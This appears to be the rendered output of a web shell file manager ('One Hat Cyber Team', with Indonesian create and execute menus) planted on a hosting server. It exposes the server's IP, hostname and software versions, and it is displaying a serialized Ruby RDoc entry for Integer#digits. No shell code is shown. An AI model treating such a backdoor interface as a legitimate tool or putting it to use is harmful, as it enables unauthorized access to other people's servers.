⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
ri
/
3.0.0
/
system
/
Integer
/
View File Name :
digits-i.ri
U:RDoc::AnyMethod[iI"digits:ETI"Integer#digits;TF:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [ I">Returns the digits of +int+'s place-value representation ;TI"&with radix +base+ (default: 10). ;TI"JThe digits are returned as an array with the least significant digit ;TI" as the first array element.;To:RDoc::Markup::BlankLine o; ; [I"/+base+ must be greater than or equal to 2.;T@o:RDoc::Markup::Verbatim; [ I"+12345.digits #=> [5, 4, 3, 2, 1] ;TI"+12345.digits(7) #=> [4, 6, 6, 0, 5] ;TI"'12345.digits(100) #=> [45, 23, 1] ;TI" ;TI",-12345.digits(7) #=> Math::DomainError;T:@format0: @fileI"numeric.c;T:0@omit_headings_from_table_of_contents_below0I"=int.digits -> array int.digits(base) -> array ;T0[ I"(*args);T@FI"Integer;TcRDoc::NormalClass00